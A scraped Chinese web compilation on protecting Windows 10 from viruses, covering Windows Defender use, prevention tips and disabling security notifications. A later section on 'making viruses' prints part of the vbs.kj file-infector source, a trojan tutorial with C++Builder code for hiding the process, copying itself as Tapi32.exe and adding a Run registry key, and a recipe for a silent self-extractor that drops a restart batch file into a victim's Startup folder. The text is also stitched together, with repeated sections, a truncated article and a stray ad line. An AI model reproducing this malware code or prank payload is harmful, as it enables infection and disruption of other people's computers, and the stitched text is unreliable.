win10如何防范病毒
1.win10设备怎么防病毒
1、Windows Defender
如果原来运行Windows 8或Windows 8.1,用户会认可Windows 10内置反病毒工具Windows Defender的效果。它会自动安装在系统中,并在后台运行,确保用户受到保护(甚至用户自己都不知道)。
原来运行Windows 7的用户,可以认为Windows Defender是升级版的Microsoft Security Essentials反病毒软件。
2、扫描病毒
Windows Defender在幕后保护系统的安全。但是,如果用户希望扫描计算机,确保自己没有受到恶意件感染,在任务栏的搜索框中输入“Windows Defender”,并按回车键。
选择“快速”选项,并点击“立即扫描”按钮,对文件和文件夹进行扫描。用户也可以选择“完全”选项,对系统进行更彻底的扫描。
3、对扫描进行定制
如果用户想对Windows Defender扫描有更大控制权,可以选择“自定义”选项,然后点击“立即扫描”按钮,系统会弹出一个窗口,其中包含用户可以选择扫描的硬盘列表。
如果用户想对列表中的一个硬盘进行扫描,可以点选该硬盘(所有子文件夹也将被选中)。用户也可以点击“+”符号,查看每个硬盘上的文件夹,进一步选择希望扫描的文件夹。
4、使Windows Defender保持最新状态
现实情况是,新威胁不断出现,这意味着Windows Defender需要保持最新状态,以便它有防御最新攻击的工具。
用户可以以手动方式更新Windows Defender,或点击“更新”选项检查它是否需要更新。但最好让Windows Defender自动更新,默认状态下其更新将包含在Windows 10更新包中。
5、查看隔离文件
在发现被感染的文件时,Windows Defender会对它进行隔离,用户在删除该文件前可以安全地对它进行检查。有时被隔离的文件可能没有什么危害。
要检查被隔离的文件,用户可以点击Windows Defender的“历史记录”选项,然后点击“查看详细信息”按钮。如果认为文件是病毒,则可以点击“删除”按钮,如果认为它不是病毒,则可以选择“还原”按钮——当然前提是确信它是安全的。
6、Windows Defender设置
要对Windows Defender的运行方式进行更多控制,用户可以点击“设置”选项,这使得用户能使用更先进的设置选项。用户可以开启或关闭“实时保护”和“基于云的保护”(TechRadar建议开启这两项功能),也可以添加排除项。
如果确信一个文件不是病毒,可以把它添加在排除项中,扫描过程会加快。
7、其他安全工具——Avast Free Antivirus
Windows Defender很好,但用户可以安装其他安全工具,获得更高的安全性。如果安装了其他反病毒软件,Windows Defender会被关闭,以避免冲突。
Avast Free Antivirus是一款流行的免费反病毒软件。喜欢使用更多工具的用户可以选择提供更多功能的付费版本。
8、另外一款安全工具——Malwarebytes
Malwarebytes是一款免费工具,经常能查杀其他反病毒软件漏报的病毒和恶意件。它可以很好地与Windows Defender搭档,TechRadar建议,如果Windows 10运行出现异常而Windows Defender没有探测到任何病毒,用户可以用Malwarebytes扫描PC。
9、远离病毒的最佳行为——之一
确保PC安全的最好方法是遵守一些原则。留神以前没有访问过的网站,当心屏幕上弹出来的广告。尽管大多数广告是安全的,但部分广告会诱骗用户下载文件。
有些弹出式窗口显示的信息提醒用户被感染恶意件,Windows要求用户下载一款反病毒软件,千万不要点击这类信息。
10、远离病毒的最佳行为——之二
对打开通过电子邮件或即时消息发送的附件要当心,尤其是来自陌生人的附件。如果有些消息好得出奇,就可能有陷阱。
2.win10设备怎么防病毒
1、Windows Defender如果原来运行Windows 8或Windows 8.1,用户会认可Windows 10内置反病毒工具Windows Defender的效果。
它会自动安装在系统中,并在后台运行,确保用户受到保护(甚至用户自己都不知道)。原来运行Windows 7的用户,可以认为Windows Defender是升级版的Microsoft Security Essentials反病毒软件。
2、扫描病毒Windows Defender在幕后保护系统的安全。但是,如果用户希望扫描计算机,确保自己没有受到恶意件感染,在任务栏的搜索框中输入“Windows Defender”,并按回车键。
选择“快速”选项,并点击“立即扫描”按钮,对文件和文件夹进行扫描。用户也可以选择“完全”选项,对系统进行更彻底的扫描。
3、对扫描进行定制如果用户想对Windows Defender扫描有更大控制权,可以选择“自定义”选项,然后点击“立即扫描”按钮,系统会弹出一个窗口,其中包含用户可以选择扫描的硬盘列表。如果用户想对列表中的一个硬盘进行扫描,可以点选该硬盘(所有子文件夹也将被选中)。
用户也可以点击“+”符号,查看每个硬盘上的文件夹,进一步选择希望扫描的文件夹。4、使Windows Defender保持最新状态现实情况是,新威胁不断出现,这意味着Windows Defender需要保持最新状态,以便它有防御最新攻击的工具。
用户可以以手动方式更新Windows Defender,或点击“更新”选项检查它是否需要更新。但最好让Windows Defender自动更新,默认状态下其更新将包含在Windows 10更新包中。
5、查看隔离文件在发现被感染的文件时,Windows Defender会对它进行隔离,用户在删除该文件前可以安全地对它进行检查。有时被隔离的文件可能没有什么危害。
要检查被隔离的文件,用户可以点击Windows Defender的“历史记录”选项,然后点击“查看详细信息”按钮。如果认为文件是病毒,则可以点击“删除”按钮,如果认为它不是病毒,则可以选择“还原”按钮——当然前提是确信它是安全的。
6、Windows Defender设置要对Windows Defender的运行方式进行更多控制,用户可以点击“设置”选项,这使得用户能使用更先进的设置选项。用户可以开启或关闭“实时保护”和“基于云的保护”(TechRadar建议开启这两项功能),也可以添加排除项。
如果确信一个文件不是病毒,可以把它添加在排除项中,扫描过程会加快。7、其他安全工具——Avast Free AntivirusWindows Defender很好,但用户可以安装其他安全工具,获得更高的安全性。
如果安装了其他反病毒软件,Windows Defender会被关闭,以避免冲突。Avast Free Antivirus是一款流行的免费反病毒软件。
喜欢使用更多工具的用户可以选择提供更多功能的付费版本。8、另外一款安全工具——是一款免费工具,经常能查杀其他反病毒软件漏报的病毒和恶意件。
它可以很好地与Windows Defender搭档,TechRadar建议,如果Windows 10运行出现异常而Windows Defender没有探测到任何病毒,用户可以用Malwarebytes扫描PC。9、远离病毒的最佳行为——之一确保PC安全的最好方法是遵守一些原则。
留神以前没有访问过的网站,当心屏幕上弹出来的广告。尽管大多数广告是安全的,但部分广告会诱骗用户下载文件。
有些弹出式窗口显示的信息提醒用户被感染恶意件,Windows要求用户下载一款反病毒软件,千万不要点击这类信息。10、远离病毒的最佳行为——之二对打开通过电子邮件或即时消息发送的附件要当心,尤其是来自陌生人的附件。
如果有些消息好得出奇,就可能有陷阱。
3.怎么办才能预防WIN10系统中毒呢
预防WIN10系统中毒方法如下:
一、永远不能排除系统感染病毒。病毒与杀毒软件是道高一尺魔高一丈的关系。因为杀毒软件永远是被动防御。只有新病毒出现发作被技术人员分析破解后,杀毒软件才能升级并预防,在升级前,新病毒无法预防。
二、只能尽量避免感染病毒。例如:
1、安装一款安全软件并保持开启。
2、不使用来路不明的光盘、u盘。如果必须使用,先扫描后使用。
3、上网不要轻易点击未知网页。不要受广告诱惑而点击未知链接。
4、不登陆黄赌毒网页。
5、聊天时不点击网友发送的未知链接。
6、及时更新病毒库。每月扫描一次硬盘。
7、重要数据及时备份。尽量使用网络云盘而不是使用u盘传输数据。
4.如何开启win10病毒防护
1、首先打开操作中心,可以看到其通知说“病毒防护已关闭,点击或单击以启用windows病毒防护”,我们直接点击其通知,快速启用病毒防护,如图所示:2、如果没有此项通知,则需要我们手动进行开启了,首先右键点击开始菜单,选择控制面板,然后以大图标查看方式找到安全性与维护并将其打开,如图所示:3、最后,找到安全栏下的病毒防护,将其开启即可,如图所示:win10没必要去使用第三方安全软件来保护我们的电脑,windows defender已经能够满足我们的基本要求。
其病毒防护功能,它能在文件被访问时及时扫描文件并拦截病毒,是一个很可靠的安全措施。虽然Win10系统有自带病毒防护功能,而我们还是会给电脑安装一些杀毒软件和保护电脑的软件。
电脑每次开机都会看到“启用病毒防护”提示窗口,在窗口下方会提示:病毒防护已关闭,点击或点击以启用Windows Defender。
5.Windows10如何打开Windows Defender防病毒
方法/步骤
1、打开开始菜单,点击设置按钮;
Win 10如何打开windows defender防病毒程序?
windows系统设置窗口自动打开;
2、在设置窗口中点击“更新和安全”;
3、设置——windows更新页面自动打开;
4、点击windows defender按钮,可以看到windows defender处于关闭状态;点击“启用Windows defender防病毒”按钮;
5、跳转到“Windows defender安全中心”页面自动打开,并点击“立即重新启动”按钮;
6、病毒和威胁防护自动打开;
7、同时可以看到Windows defender窗口中,启用Windows Defender防病毒按钮,已经更改为Windows Defender安全中心的索引按钮了。
如何观比win10病毒
1.Windows10如何打开Windows Defender防病毒?搜狗问问
方法/步骤
1、打开开始菜单,点击设置按钮;
Win 10如何打开windows defender防病毒程序?
windows系统设置窗口自动打开;
2、在设置窗口中点击“更新和安全”;
3、设置——windows更新页面自动打开;
4、点击windows defender按钮,可以看到windows defender处于关闭状态;点击“启用Windows defender防病毒”按钮;
5、跳转到“Windows defender安全中心”页面自动打开,并点击“立即重新启动”按钮;
6、病毒和威胁防护自动打开;
7、同时可以看到Windows defender窗口中,启用Windows Defender防病毒按钮,已经更改为Windows Defender安全中心的索引按钮了。
2.win10 启用病毒防护是怎么回事
前两天微软发布了Win10的正式版,许多小伙伴们都纷纷加入到了Win10的阵营。
然而Win10是新发布的系统,其中的设置与前代的系统有许多不同,笔者也是在使用过程中有许多困惑,幸运的是许多问题都能在网上找到解决办法。 然而使用至今唯独一个小小的提示让笔者实在找不到解决办法,在网上查找了许久也没有实质性的解决,这就是烦人的“启用病毒防护”或者是“启用Windows防火墙”等类似的提示。
每次开机都会在电脑右下角弹出。 首先我们要知道造成这个现象的原因是你安装了其他的病毒、木马防护软件,比如:360安全卫士、QQ电脑管家等。
这些软件会使windows默认的病毒防护软件关闭,一旦默认的病毒防护软件被关闭,出于安全考虑,windows会在你每次开机的时候提示你。 找到原因了,那我们就来看一下解决办法吧。
win10老显示病毒
1.windows10一直提示病毒防护怎么办
首先我要打开系统的控制面板,如果你已经打开了可以跳到第5步。
如果你是新装的系统,或者不知道如何打开控制面板,请跟着我操作:在桌面右键,然后点击“个性化”。
在“个性化”的窗口中,点击左边的“主题”,然后点击“桌面图标设置”。
在弹出的“桌面图标设置”窗口中勾选“控制面板”,这样“控制面板”就显示在我们的桌面了。
回到桌面,双击“控制面板”。
在“控制面板”的窗口中,我们在右上角的“类别”里选择“大图标”。
重要的来了,我们在众多的选项中找到“安全性与维护”这一选项,点进去。
在“安全性与维护”的窗口中,点击左边的“更改安全性与维护设置”
8
在这里你会发现,什么防火墙啊,病毒防护啊等等一系列的系统提示都可以在这里取消提示。
只需要在不想要系统提示的项面前把对勾取消掉,最后,别忘了点击“确定”保存设置哦!
2.WIN10电脑出现病毒有什么特征么?
目前,还没有什么比较常见的病毒特征,这要主要归功于免费安全软件的普及和Windows系统自身安全性的不断提升,电脑大规模中毒的现象减少。当然,病毒也有新的入侵方式,更为隐秘(除了勒索病毒,像前段时间的哭泣勒索病毒就比较高调),这使得我们很难有一个比较明确电脑中毒的特征。
不过,总归是有迹可循的,比如异常的进程(CPU、内存占用过高)、异常上传下载(很难发现)、异常的用户身份等等。
只要你不冒险浏览危险站点、不使用不明来源的软件程序和硬件,时常留意电脑异常,经常查毒杀毒,正所谓有备无患,相信不会很容易感染病毒的。
3.win10 启用病毒防护是怎么回事
前两天微软发布了Win10的正式版,许多小伙伴们都纷纷加入到了Win10的阵营。
然而Win10是新发布的系统,其中的设置与前代的系统有许多不同,笔者也是在使用过程中有许多困惑,幸运的是许多问题都能在网上找到解决办法。 然而使用至今唯独一个小小的提示让笔者实在找不到解决办法,在网上查找了许久也没有实质性的解决,这就是烦人的“启用病毒防护”或者是“启用Windows防火墙”等类似的提示。
每次开机都会在电脑右下角弹出。 首先我们要知道造成这个现象的原因是你安装了其他的病毒、木马防护软件,比如:360安全卫士、QQ电脑管家等。
这些软件会使windows默认的病毒防护软件关闭,一旦默认的病毒防护软件被关闭,出于安全考虑,windows会在你每次开机的时候提示你。 找到原因了,那我们就来看一下解决办法吧。
4.Win10,Windows defender,每次下软件几乎都提示是垃圾/病毒,怎么
可能情况一:组策略设置不正确
第一步、搜索框中输入“gpedit.msc”,结果中点击“编辑组策略”
第二步、在本地组策略编辑器窗口,依次展开计算机配置->管理模板->WINDOWS组件->Windows Defender,在右侧窗口找到并双击“关闭Windows Defender”项目
第三步、在关闭Windows Defender设置窗口,点击选择“未配置”或者“已禁用”后,确定即可
可能情况二:Defender服务未启动
第一步、同样在搜索框中输入“services.msc”,结果中点击“services.msc Microsoft通用管理文档”
第二步、在弹出的服务窗口,找到并双击打开Windows Defender Service内容转载自
第三步、在Windows Defender Service的属性窗口,将启动类型设置成“自动”并点击服务状态下面的启动,稍后会出现一个服务器东莞成,成功后即可正常
win10如何制作病毒
1.怎么制作和发送重启小病毒?
电脑为什么自动重启或者电脑自动关机是什么原因?一、软件1.病毒破坏比较典型的就是前一段时间对全球计算机造成严重破坏的“冲击波”病毒,发作时还会提示系统将在60秒后自动启动。其实,早在DOS时代就有不少病毒能够自动重启你的计算机。对于是否属于病毒破坏,我们可以使用最新版的杀毒软件进行杀毒,一般都会发现病毒存在。当然,还有一种可能是当你上网时被人恶意侵入了你的计算机,并放置了木马程序。这样对方能够从远程控制你计算机的一切活动,当然也包括让你的计算机重新启动。对于有些木马,不容易清除,最好重新安装操作系统。2.系统文件损坏当系统文件被破坏时,如Win2K下的KERNEL32.DLL,Win98下的FONTS目录下面的字体等系统运行时基本的文件被破坏,系统在启动时会因此无法完成初始化而强迫重新启动。你可以做个试验,把WIN98目录下的字库“FONTS”改名试一试。当你再次开机时,我们的计算机就会不断的重复启动。对于这种故障,因为无法进入正常的桌面,只能覆盖安装或重新安装。3.定时软件或计划任务软件起作用如果你在“计划任务栏”里设置了重新启动或加载某些工作程序时,当定时时刻到来时,计算机也会再次启动。对于这种情况,我们可以打开“启动”项,检查里面有没有自己不熟悉的执行文件或其他定时工作程序,将其屏蔽后再开机检查。当然,我们也可以在“运行”里面直接输入“Msconfig”命令选择启动项。二、硬件1.市电电压不稳解决方法:对于经常性供电不稳的地区,我们可以购置UPS电源或130-260V的宽幅开关电源来保证计算机稳定工作。2.插排或电源插座的质量差,接触不良解决方法:① 不要图省钱而购买价廉不物美的电源排插,购买一些名牌的电源插排,因为其内部都是机器自动安装压接的,没有采用手工焊接。② 对于是否属于墙壁插座内部虚接的问题,我们可以把主机换一个墙壁插座试一试,看是否存在同样的自动重启问题。3.计算机电源的功率不足或性能差解决方法:现换高质量大功率计算机电源。4.主机开关电源的市电插头松动,接触不良,没有插紧解决方法:更换优质的3C认证电源线。5.主板的电源ATX20插座有虚焊,接触不良解决方法:① 如果是主板焊点虚焊,直接用电烙铁补焊就可以了。注意:在对主板、硬盘、显卡等计算机板卡焊接时,一定要将电烙铁良好接地,或者在焊接时拔下电源插头。② 如果是电源的问题,最好是更换一台好的电源。6.CPU问题CPU内部部分功能电路损坏,二级缓存损坏时,计算机也能启动,甚至还会进入正常的桌面进行正常操作,但当进行某一特殊功能时就会重启或死机,如画表,播放VCD,玩游戏等。解决办法:试着在CMOS中屏蔽二级缓存(L2)或一级缓存(L1),看主机是否能够正常运行;再不就是直接用好的CPU进行替换排除。如果屏蔽后能够正常运行,还是可以凑合着使用,虽然速度慢些,但必竟省钱了。7.内存问题内存条上如果某个芯片不完全损坏时,很有可能会通过自检(必竟多数都设置了POST),但是在运行时就会因为内存发热量大而导致功能失效而意外重启。多数时候内存损坏时开机会报警,但内存损坏后不报警,不加电的故障都还是有的。最好使用排除法,能够快速确定故障部位。8.光驱问题如果光驱内部损坏时,也会导致主机启动缓慢或不能通过自检,也可能是在工作过程中突然重启。对于后一种情况如果是我们更换了光驱后出现的,很有可能是光驱的耗电量不同而引起的。大家需要了解的是,虽然光驱的ATPI接口相同,但不同生产厂家其引脚定义是不相同的,如果我们的硬盘线有问题时,就可能产生对某一牌子光驱使用没有问题,但对其他牌子光驱就无法工作的情况,这需要大家注意。9.RESET键质量有问题如果RESET开关损坏,内部簧片始终处于短接的位置时,主机就无法加电自检。但是当RESET开关弹性减弱或机箱上的按钮按下去不易弹起时,就会出现在使用过程中,因为偶尔的触碰机箱或者在正常使用状态下而主机突然重启。所以,当RESET开关不能按动自如时,我们一定要仔细检查,最好更换新的 RESET按钮开关或对机箱的外部按钮进行加油润滑处理。还有一种情况,是因为机箱内的RESET开关引线在焊接时绝缘层剥离过多,再加上使用过程中多次拆箱就会造成RESET开关线距离过近而引起碰撞,导致主机自动重启。10.接入网卡或并口、串口、USB接口接入外部设备时自动重
开心影院欢迎您!
2.如何制作“百毒不侵”的Windows系统呢?
1、安装系统后(包括Ghost XP),首先把所有分区都转化成NTFS格式,很重要哦。
不要说不会啊,就是单击开始按钮——>运行。输入 “convert c: /fs:ntfs”,可以把C盘转换成NTFS格式,不过要重启才能转换哦,其它盘就把C改成相应的盘符就行了。
2、在控制面板中打开“用户帐号”,将Administrator修改密码,尽量复杂些,不一定要记得。再创建一个计算机管理员用户和受限用户,管理员用户一定要密码,且也要复杂一些,这个密码要记住。
因为以后装软件,游戏要用上。当然,记不住可以在DOS下改。
3、设置好后,进入创建的计算机管理员用户,打开“我的电脑”,单击“工具”——>“文件夹选项”,点击第二个选项卡“查看”,把里面的“使用简单文件共享(推荐)”前的勾去掉。这个是以后打开文件夹或文件的属性时会出现“安全”选项卡。
4、把所有分区属性的“安全”选项卡中“users”用户去掉。 这是它默认有一个特殊权限,可以在分区下或文件夹内创建文件夹,再可以创建或保存文件,这可能给病毒可乘之机。
所以去掉。还有一个是“everyone”。
也去掉。添加创建的受限用户进去,权限是“只读”。
5、个别文件的权限问题:象QQ、游戏都需要完全权限,所以在计算机管理员用户中要给受限用户完全权限。 QQ最好把与QQ程序在一起的文件给只读权限,防止木马替换QQ及相关的DLL文件。
6、在“运行”中输入“REGEDIT”,打开注册表,把里面的[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]或[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce]的权限设为只读。 防止病毒利用此处启动。
7、清理上网缓存及临时文件,上网时,一般缓存放在C:\Documents and Settings\用户名\Local Settings\Temporary Internet Files中,这也是病毒藏匿的地方,还有就是C:\Documents and Settings\用户名\Local Settings\Temp 下的临时文件。 很多程序要用到这个地方。
病毒也喜欢藏在这里,所以,在开机时,用批命令清空这两个文件夹。让病毒无处藏身。
批命令为: del C:\docume~1\用户名\Locals~1\Tempor~1\*。* del C:\Docume~1\用户名\Locals~1\Temp\*。
* 当然还可以把History和Cookies都清空。 做一个批命令文件,放到开始菜单中的“启动”项中。
这样也就做好了受限用户上网的准备工作,网上的病毒已经无法感染你的系统,也无法更改系统文件,对其它分区也无权更改,这样U盘病毒也无关紧要,因为病毒无法写入分区根目录下。 网页病毒无法更改系统文件,再凶的网页病毒也无能为力了。
3.WIN10如何增加WINdowsDefende杀毒功能?
1、该程序双击运行,一路点击下一步,然后选择你制作的介质:光盘、U盘或者ISO镜像。
2、这三种方式各有所长,不过一般来说U盘用的多一些,下面以这种方法为例进行介绍。 3、插入U盘后,在U盘选择界面确定使用哪个U盘,然后点击下一步开始制作。
4、制作分为4个步骤,主要是文件下载比较费时间,测试后发现这一下载速度很慢,而且下载的文件有227.31MB,需要等待较长时间。注意:如果你采用另外两种方式,也需要下载相同的文件,区别在于这几种方式最后对该文件处理不同:一个是写入U盘,另外是做成光盘或ISO镜像。
5、下载并且制作完毕后,就可以利用这个U盘或者光盘重启电脑,这个过程中需要选择让光盘或者U盘启动。6、启动之后就可以见到WINdows Defender熟悉的界面。
4.Win10系统下如何制作绝对安全无毒的U盘?
既然病毒是依靠改写autorun这个文件进行传播,那最最简单的方法就是在U盘上建个无法进行任何操作的autorun.inf就好了。
先把U盘插到电脑上,看看系统给它分配的是哪个盘符。然后打开命令提示符(管理员),输入md F:\autorun.infU盘里面就多出了个autorun.inf文件夹。
继续输入cd /d F:\autorun.inf进入新建的文件夹路径后,输入md 安全文件夹。\\。
OK,现在就建立好了无法被改写删除的autorun了哦。无法被删除也无法被改写,小病毒是无能为力的。
大家想要删除它的话,直接格式化就好了,简单吧?。
5.怎样制作一些基本的电脑病毒
那就看看vbs.kj的源码
Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDisk
Sub KJ_start()
\' 初始化变量
KJSetDim()
\' 初始化环境
KJCreateMilieu()
\' 感染本地或者共享上与html所在目录
KJLikeIt()
\' 通过vbs感染Outlook邮件模板
KJCreateMail()
\' 进行病毒传播
KJPropagate()
End Sub
\' 函数:KJAppendTo(FilePath,TypeStr)
\' 功能:向指定类型的指定文件追加病毒
\' 参数:
\' FilePath 指定文件路径
\' TypeStr 指定类型
Function KJAppendTo(FilePath,TypeStr)
On Error Resume Next
\' 以只读方式打开指定文件
Set ReadTemp = FSO.OpenTextFile(FilePath,1)
\' 将文件内容读入到TmpStr变量中
TmpStr = ReadTemp.ReadAll
\' 判断文件中是否存在“KJ_start()“字符串,若存在说明已经感染,退出函数;
\' 若文件长度小于1,也退出函数。
If Instr(TmpStr,“KJ_start()“) <> 0 Or Len(TmpStr) < 1 Then
ReadTemp.Close
Exit Function
End If
\' 如果传过来的类型是“htt“
\' 在文件头加上调用页面的时候加载KJ_start()函数;
\' 在文件尾追加html版本的加密病毒体。
\' 如果是“html“
\' 在文件尾追加调用页面的时候加载KJ_start()函数和html版本的病毒体;
\' 如果是“vbs“
\' 在文件尾追加vbs版本的病毒体
If TypeStr = “htt“ Then
ReadTemp.Close
Set FileTemp = FSO.OpenTextFile(FilePath,2)
FileTemp.Write “<“ & “BODY onl oad=“““ & “vbscript:“ & “KJ_start()“““ & “>“ & vbCrLf & TmpStr & vbCrLf & HtmlText
FileTemp.Close
Set FAttrib = FSO.GetFile(FilePath)
FAttrib.attributes = 34
Else
ReadTemp.Close
Set FileTemp = FSO.OpenTextFile(FilePath,8)
If TypeStr = “html“ Then
FileTemp.Write vbCrLf & “<“ & “HTML>“ & vbCrLf & “<“ & “BODY onl oad=“““ & “vbscript:“ & “KJ_start()“““ & “>“ & vbCrLf & HtmlText
ElseIf TypeStr = “vbs“ Then
FileTemp.Write vbCrLf & VbsText
End If
6.如何编写木马病毒的具体操作
木马一定是由两部分组成——服务器程序(Server)和客户端程序(Client),服务器负责打开攻击的道路,就像一个内奸特务;客户端负责攻击目标,两者需要一定的网络协议来进行通讯(一般是TCP/IP协议)。
为了让大家更好的了解木马攻击技术,破除木马的神秘感,我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马,使大家能更好地防范和查杀各种已知和未知的木马。 首先是编程工具的选择。
目前流行的开发工具有C++Builder、VC、VB和Delphi,这里我们选用C++Builder(以下简称BCB);VC虽然好,但GUI设计太复杂,为了更好地突出我的例子,集中注意力在木马的基本原理上,我们选用可视化的BCB;Delphi也不错,但缺陷是不能继承已有的资源(如“死牛崇拜”黑客小组公布的BO2000源代码,是VC编写的,网上俯拾皆是);VB嘛,谈都不谈——难道你还给受害者传一个1兆多的动态链接库——Msvbvm60.dll吗? 启动C++Builder 5.0企业版,新建一个工程,添加三个VCL控件:一个是Internet页中的Server Socket,另两个是Fastnet页中的NMFTP和NMSMTP。Server Socket的功能是用来使本程序变成一个服务器程序,可以对外服务(对攻击者敞开大门)。
Socket最初是在Unix上出现的,后来微软将它引入了Windows中(包括Win98和WinNt);后两个控件的作用是用来使程序具有FTP(File Transfer Protocol文件传输协议)和SMTP(Simple Mail Transfer Protocol简单邮件传输协议)功能,大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。 Form窗体是可视的,这当然是不可思议的。
不光占去了大量的空间(光一个Form就有300K之大),而且使软件可见,根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form,就像Delphi用过程实现的小程序一般只有17K左右那样。
我们首先应该让我们的程序能够隐身。双击Form,首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的代码。
这看起来很神秘,其实说穿了不过是一种被称之为Service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。因此,只要将我们的程序在进程数据库中用()函数注册成服务进程(Service Process)就可以了。
不过该函数的声明在Borland预先打包的头文件中没有,那么我们只好自己来声明这个位于KERNEL32.DLL中的鸟函数了。 首先判断目标机的操作系统是Win9x还是WinNt: { DWORD dwVersion = GetVersion(); // 得到操作系统的版本号 if (dwVersion >= 0x80000000) // 操作系统是Win9x,不是WinNt { typedef DWORD (CALLBACK* )(DWORD,DWORD); file://定/义()函数的原型 HINSTANCE hDLL; ; hDLL = LoadLibrary("KERNEL32"); file://加/载()函数所在的动态链接库KERNEL32.DLL = ()GetProcAddress(hDLL,""); file://得/到()函数的地址 (GetCurrentProcessId(),1); file://执/行()函数,隐藏本进程 FreeLibrary(hDLL); file://卸/载动态链接库 } } 这样就终于可以隐身了(害我敲了这么多代码!)。
为什么要判断操作系统呢?因为WinNt中的进程管理器可以对当前进程一览无余,因此没必要在WinNt下也使用以上代码(不过你可以使用其他的方法,这个留到后面再讲)。接着再将自己拷贝一份到%System%目录下,例如: C:\Windows\System,并修改注册表,以便启动时自动加载: { char TempPath[MAX_PATH]; file://定/义一个变量 GetSystemDirectory(TempPath ,MAX_PATH); file://TempPath/是system目录缓冲区的地址,MAX_PATH是缓冲区的大小,得到目标机的System目录路径 SystemPath=AnsiString(TempPath); file://格/式化TempPath字符串,使之成为能供编译器使用的样式 CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\Tapi32.exe").c_str() ,FALSE); file://将/自己拷贝到%System%目录下,并改名为Tapi32.exe,伪装起来 Registry=new TRegistry; file://定/义一个TRegistry对象,准备修改注册表,这一步必不可少 Registry->RootKey=HKEY_LOCAL_MACHINE; file://设/置主键为HKEY_LOCAL_MACHINE Registry->OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run",TRUE); file://打/开键值Software\\Microsoft\\Windows\\CurrentVersion\\Run,如果不存在,就创建之 try { file://如/果以下语句发生异常,跳至catch,以避免程序崩溃 if(Registry->ReadString("crossbow")!=SystemPath+"\\Tapi32.exe") Registry->WriteString("crossbow",SystemPath+"\\Tapi32.exe"); file://查/找是否有“crossbow”字样的键值,并且是否为拷贝的目录%System%+Tapi32.exe file://如/果不是,就写入以上键值和内。
7.怎样制作一个小病毒
右键--新建快捷方式--项目地址 %windir%\system32\shutdown.exe -s -t 0 下一步保存就行了这是自动关机的,最后的0是关机延时你可以改成50或10
还有一种,网上刚找,原理差不多,但比我那个高级:
新建一个文本文档,在其中输入“shutdown -r -t 30”(不包含双引号)然后保存为扩展名为.bat的文件。
一旦运行这个文件桌面就会弹出一个倒计时30秒重启的对话框。我们还可以再修改一下,把“-r”改成“-s”(不包含双引号)这样在运行后就只是关机而不重启。注意:其中的30是关机或重启的倒计时时间,你可以随便改。
我们还可以再进行加工,就是让它在每次开机时自动运行,步骤如下:
步骤1、右击这个文件,在弹出的快捷菜单中选择“添加到压缩文件”。
步骤2、双击打开这个压缩文件,工具栏中选择“自解压格式”。
步骤3、在出现的自解压设置中点击“高级自解压选项”,然后在解压后运行中输入刚才保存的那个文件名,在解压路径输入:C:\Documents and Settings\Administrator\[开始] 菜单\程序\启动”。
步骤4、在模式中的安静模式选择“全部隐藏”。最后点击确定即可生成一个自解压文件。
这样我在运行这个自解压文件时就会自动运行那个病毒文件,并将其解压到启动文件夹中,让其在每次开机时都运行。对方在运行我们制作的病毒后他的电脑就会不间断的重启,是不是很好玩呀!
要想不重启只要在dos下输入“shutdown -a”回车,然后再把启动文件夹中的病毒删除即可。
转载请注明出处windows之家 » win10为什么不怕病毒